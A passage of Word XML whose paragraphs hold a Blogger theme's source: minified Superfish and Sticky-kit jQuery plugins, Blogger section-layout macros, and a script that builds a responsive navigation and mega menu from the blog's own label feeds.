    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> * Dual licensed under the MIT and GPL licenses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>http://www.opensource.org/licenses/mit-license.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>http://www.gnu.org/licenses/gpl.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      !function(e,s){"use strict";var n=function(){var n={bcClass:"sf-breadcrumb",menuClass:"sf-js-enabled",anchorClass:"sf-with-ul",menuArrowClass:"sf-arrows"},o=function(){var s=/^(?![\w\W]*Windows Phone)[\w\W]*(iPhone|iPad|iPod)/i.test(navigator.userAgent);return s&amp;&amp;e("html").css("cursor","pointer").on("click",e.noop),s}(),t=function(){var e=document.documentElement.style;return"behavior"in e&amp;&amp;"fill"in e&amp;&amp;/iemobile/i.test(navigator.userAgent)}(),i=!!s.PointerEvent,r=function(e,s,o){var t=n.menuClass;s.cssArrows&amp;&amp;(t+=" "+n.menuArrowClass),e[o?"addClass":"removeClass"](t)},a=function(s,o){return s.find("li."+o.pathClass).slice(0,o.pathLevels).addClass(o.hoverClass+" "+n.bcClass).filter(function(){return e(this).children(o.popUpSelector).hide().show().length}).removeClass(o.pathClass)},l=function(e,s){var o=s?"addClass":"removeClass";e.children("a")[o](n.anchorClass)},h=function(e){var s=e.css("ms-touch-action"),n=e.css("touch-action");n="pan-y"===(n=n||s)?"auto":"pan-y",e.css({"ms-touch-action":n,"touch-action":n})},u=function(e){return e.closest("."+n.menuClass)},p=function(e){return u(e).data("sfOptions")},c=function(){var s=e(this),n=p(s);clearTimeout(n.sfTimer),s.siblings().superfish("hide").end().superfish("show")},f=function(s){s.retainPath=e.inArray(this[0],s.$path)&gt;-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1,this.superfish("hide"),this.parents("."+s.hoverClass).length||(s.onIdle.call(u(this)),s.$path.length&amp;&amp;e.proxy(c,s.$path)())},d=function(){var s=e(this),n=p(s);o?e.proxy(f,s,n)():(clearTimeout(n.sfTimer),n.sfTimer=setTimeout(e.proxy(f,s,n),n.delay))},v=function(s){var n=e(this),o=p(n),t=n.siblings(s.data.popUpSelector);if(!1===o.onHandleTouch.call(t))return this;t.length&gt;0&amp;&amp;t.is(":hidden")&amp;&amp;(n.one("click.superfish",!1),"MSPointerDown"===s.type||"pointerdown"===s.type?n.trigger("focus"):e.proxy(c,n.parent("li"))())},m=function(s,n){var r="li:has("+n.popUpSelector+")";e.fn.hoverIntent&amp;&amp;!n.disableHI?s.hoverIntent(c,d,r):s.on("mouseenter.superfish",r,c).on("mouseleave.superfish",r,d);var a="MSPointerDown.superfish";i&amp;&amp;(a="pointerdown.superfish"),o||(a+=" touchend.superfish"),t&amp;&amp;(a+=" mousedown.superfish"),s.on("focusin.superfish","li",c).on("focusout.superfish","li",d).on(a,"a",n,v)};return{hide:function(s){if(this.length){var n=this,o=p(n);if(!o)return this;var t=!0===o.retainPath?o.$path:"",i=n.find("li."+o.hoverClass).add(this).not(t).removeClass(o.hoverClass).children(o.popUpSelector),r=o.speedOut;if(s&amp;&amp;(i.show(),r=0),o.retainPath=!1,!1===o.onBeforeHide.call(i))return this;i.stop(!0,!0).animate(o.animationOut,r,function(){var s=e(this);o.onHide.call(s)})}return this},show:function(){var e=p(this);if(!e)return this;var s=this.addClass(e.hoverClass).children(e.popUpSelector);return!1===e.onBeforeShow.call(s)?this:(s.stop(!0,!0).animate(e.animation,e.speed,function(){e.onShow.call(s)}),this)},destroy:function(){return this.each(function(){var s,o=e(this),t=o.data("sfOptions");if(!t)return!1;s=o.find(t.popUpSelector).parent("li"),clearTimeout(t.sfTimer),r(o,t),l(s),h(o),o.off(".superfish").off(".hoverIntent"),s.children(t.popUpSelector).attr("style",function(e,s){if(void 0!==s)return s.replace(/display[^;]+;?/g,"")}),t.$path.removeClass(t.hoverClass+" "+n.bcClass).addClass(t.pathClass),o.find("."+t.hoverClass).removeClass(t.hoverClass),t.onDestroy.call(o),o.removeData("sfOptions")})},init:function(s){return this.each(function(){var o=e(this);if(o.data("sfOptions"))return!1;var t=e.extend({},e.fn.superfish.defaults,s),i=o.find(t.popUpSelector).parent("li");t.$path=a(o,t),o.data("sfOptions",t),r(o,t,!0),l(i,!0),h(o),m(o,t),i.not("."+n.bcClass).superfish("hide",!0),t.onInit.call(this)})}}}();e.fn.superfish=function(s,o){return n[s]?n[s].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof s&amp;&amp;s?e.error("Method "+s+" does not exist on jQuery.fn.superfish"):n.init.apply(this,arguments)},e.fn.superfish.defaults={popUpSelector:"ul,.sf-mega",hoverClass:"sfHover",pathClass:"overrideThisToUse",pathLevels:1,delay:800,animation:{opacity:"show"},animationOut:{opacity:"hide"},speed:"normal",speedOut:"fast",cssArrows:!0,disableHI:!1,onInit:e.noop,onBeforeShow:e.noop,onShow:e.noop,onBeforeHide:e.noop,onHide:e.noop,onIdle:e.noop,onDestroy:e.noop,onHandleTouch:e.noop}}(jQuery,window);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      /*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> Sticky-kit v1.1.2 | WTFPL | Leaf Corcoran 2015 | http://leafo.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      // Generated by CoffeeScript 1.9.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      (function(){var t,i;t=this.jQuery||window.jQuery,i=t(window),t.fn.stick_in_parent=function(o){var s,e,n,r,c,l,a,f,u,p,d,h;for(null==o&amp;&amp;(o={}),h=o.sticky_class,l=o.inner_scrolling,d=o.recalc_every,p=o.p</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>arent,u=o.offset_top,f=o.spacer,n=o.bottoming,null==u&amp;&amp;(u=0),null==p&amp;&amp;(p=void 0),null==l&amp;&amp;(l=!0),null==h&amp;&amp;(h="is_stuck"),s=t(document),null==n&amp;&amp;(n=!0),r=function(o,e,r,c,a,g,k,m){var v,y,_,b,w,x,C,I,z,A,j,M;if(!o.data("sticky_kit")){if(o.data("sticky_kit",!0),w=s.height(),C=o.parent(),null!=p&amp;&amp;(C=C.closest(p)),!C.length)throw"failed to find stick parent";if(_=!1,v=!1,(j=null!=f?f&amp;&amp;o.closest(f):t("&lt;div /&gt;"))&amp;&amp;j.css("position",o.css("position")),(I=function(){var t,i,n;if(!m)return w=s.height(),t=parseInt(C.css("border-top-width"),10),i=parseInt(C.css("padding-top"),10),e=parseInt(C.css("padding-bottom"),10),r=C.offset().top+t+i,c=C.height(),_&amp;&amp;(_=!1,v=!1,null==f&amp;&amp;(o.insertAfter(j),j.detach()),o.css({position:"",top:"",width:"",bottom:""}).removeClass(h),n=!0),a=o.offset().top-(parseInt(o.css("margin-top"),10)||0)-u,g=o.outerHeight(!0),k=o.css("float"),j&amp;&amp;j.css({width:o.outerWidth(!0),height:g,display:o.css("display"),"vertical-align":o.css("vertical-align"),float:k}),n?M():void 0})(),g!==c)return b=void 0,x=u,A=d,M=function(){if(t(document).width()&gt;980){var p,y,z,M,Q,T;if(m)return;if(z=!1,null!=A&amp;&amp;(A-=1)&lt;=0&amp;&amp;(A=d,I(),z=!0),z||s.height()===w||(I(),z=!0),M=i.scrollTop(),null!=b&amp;&amp;(y=M-b),b=M,_?(n&amp;&amp;(Q=M+g+x&gt;c+r,v&amp;&amp;!Q&amp;&amp;(v=!1,o.css({position:"fixed",bottom:"",top:x}).trigger("sticky_kit:unbottom"))),M&lt;a&amp;&amp;(_=!1,x=u,null==f&amp;&amp;("left"!==k&amp;&amp;"right"!==k||o.insertAfter(j),j.detach()),p={position:"",width:"",top:""},o.css(p).removeClass(h).trigger("sticky_kit:unstick")),l&amp;&amp;(T=i.height(),g+u&gt;T&amp;&amp;(v||(x-=y,x=Math.max(T-g,x),x=Math.min(u,x),_&amp;&amp;o.css({top:x+"px"}))))):M&gt;a&amp;&amp;(_=!0,(p={position:"fixed",top:x}).width="border-box"===o.css("box-sizing")?o.outerWidth()+"px":o.width()+"px",o.css(p).addClass(h),null==f&amp;&amp;(o.after(j),"left"!==k&amp;&amp;"right"!==k||j.append(o)),o.trigger("sticky_kit:stick")),_&amp;&amp;n&amp;&amp;(null==Q&amp;&amp;(Q=M+g+x&gt;c+r),!v&amp;&amp;Q))return v=!0,"static"===C.css("position")&amp;&amp;C.css({position:"relative"}),o.css({position:"absolute",bottom:e,top:"auto"}).trigger("sticky_kit:bottom")}},z=function(){return I(),M()},y=function(){if(m=!0,i.off("touchmove",M),i.off("scroll",M),i.off("resize",z),t(document.body).off("sticky_kit:recalc",z),o.off("sticky_kit:detach",y),o.removeData("sticky_kit"),o.css({position:"",bottom:"",top:"",width:""}),C.position("position",""),_)return null==f&amp;&amp;("left"!==k&amp;&amp;"right"!==k||o.insertAfter(j),j.remove()),o.removeClass(h)},i.on("touchmove",M),i.on("scroll",M),i.on("resize",z),t(document.body).on("sticky_kit:recalc",z),o.on("sticky_kit:detach",y),setTimeout(M,0)}},c=0,a=this.length;c&lt;a;c++)e=this[c],r(t(e));return this}}).call(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;macro:includable id='sections' var='col'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;macro:if cond='data:col.num == 0'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;macro:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:section mexpr:class='data:col.class' mexpr:id='data:col.idPrefix + &amp;quot;-1&amp;quot;' preferred='yes' showaddelement='yes'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;macro:if cond='data:col.num &amp;gt;= 2'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div mexpr:class='&amp;quot; section-columns columns melesa-cols-&amp;quot; + data:col.num'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='first columns-cell'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:section mexpr:class='data:col.class' mexpr:id='data:col.idPrefix + &amp;quot;-2-1&amp;quot;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='columns-cell'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:section mexpr:class='data:col.class' mexpr:id='data:col.idPrefix + &amp;quot;-2-2&amp;quot;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;macro:if cond='data:col.num &amp;gt;= 3'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='columns-cell'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:section mexpr:class='data:col.class' mexpr:id='data:col.idPrefix + &amp;quot;-2-3&amp;quot;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/macro:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;macro:if cond='data:col.num &amp;gt;= 4'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='columns-cell'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:section mexpr:class='data:col.class' mexpr:id='data:col.idPrefix + &amp;quot;-2-4&amp;quot;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/macro:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;macro:if cond='data:col.includeBottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;b:section mexpr:class='data:col.class' mexpr:id='data:col.idPrefix + &amp;quot;-3&amp;quot;' showaddelement='no'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/macro:if&gt;--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/macro:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/macro:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/macro:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      $(document).ready(function ($) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var k = -1 , o = "" , p = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $("#NavG #NavM").find("ul").find("li").each(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          for (var text = $(this).text(), url = $(this).find("a").attr("href"), x = 0, z = 0; z &lt; text.length &amp;&amp; (x = text.indexOf("_", x), -1 != x); z++) x++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if (level = z, level &gt; k &amp;&amp; (o += "&lt;ul&gt;", p += "&lt;ul&gt;"), level &lt; k) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            offset = k - level;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            for (var z = 0; z &lt; offset; z++) o += "&lt;/ul&gt;&lt;/li&gt;", p += "&lt;/ul&gt;&lt;/li&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          text = text.replace(/_/gi, ""), o += "&lt;li&gt;&lt;a href='" + url + "'&gt;" + text + "&lt;/a&gt;", p += "&lt;li&gt;&lt;a href='" + url + "'&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          for (var z = 0; z &lt; level; z++) p += "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          p += text + "&lt;/a&gt;", k = level</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        for (var x = 0; k &gt;= x; x++) o += "&lt;/ul&gt;", p += "&lt;/ul&gt;", 0 != x &amp;&amp; (o += "&lt;/li&gt;", p += "&lt;/li&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $("#NavM").html(function(){  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $(this).html(p);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $(this).removeClass('hidden');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //responsive mega links</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $("#srt option").map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var at = $(this).attr('value');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            if(at){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              //console.log(at);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              at = at.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var t = $(this).text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if(at.indexOf('[mega menu]') != -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                $(this).attr('value', '/search/label/'+t + '?&amp;max-results=' + perpage);</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var cg = '&lt;div class="responsive-navigation"&gt;&lt;select id="ndd" onchange=\'window.location.assign(document.getElementById("ndd").value)\'&gt;'+ $('#srt').html() +'&lt;/select&gt;&lt;/div&gt;&lt;div id="NavO" class="non_responsive"&gt;'+ p +'&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#NavS').html(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            //console.log(cg);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $(this).html(cg);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            //deal with mega menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('#NavO ul li a,#NavM ul li a').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var a = $(this).attr('href');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var $t = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              a = a.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if(a.indexOf('[mega menu]') != -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                var l = $(this).text();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  url : "/feeds/posts/default/-/" + l + "?alt=json-in-script&amp;max-results=4",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  success: function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    //console.log(JSON.stringify(e));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    var c  = '&lt;ul&gt;&lt;li&gt;&lt;div class="mega row"&gt;&lt;div class="mega-item-wrap"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      for(var i=0;i&lt;e.feed.entry.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var k = e.feed.entry[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var pt = k.title.$t;</w:t>
      </w:r>
    </w:p>
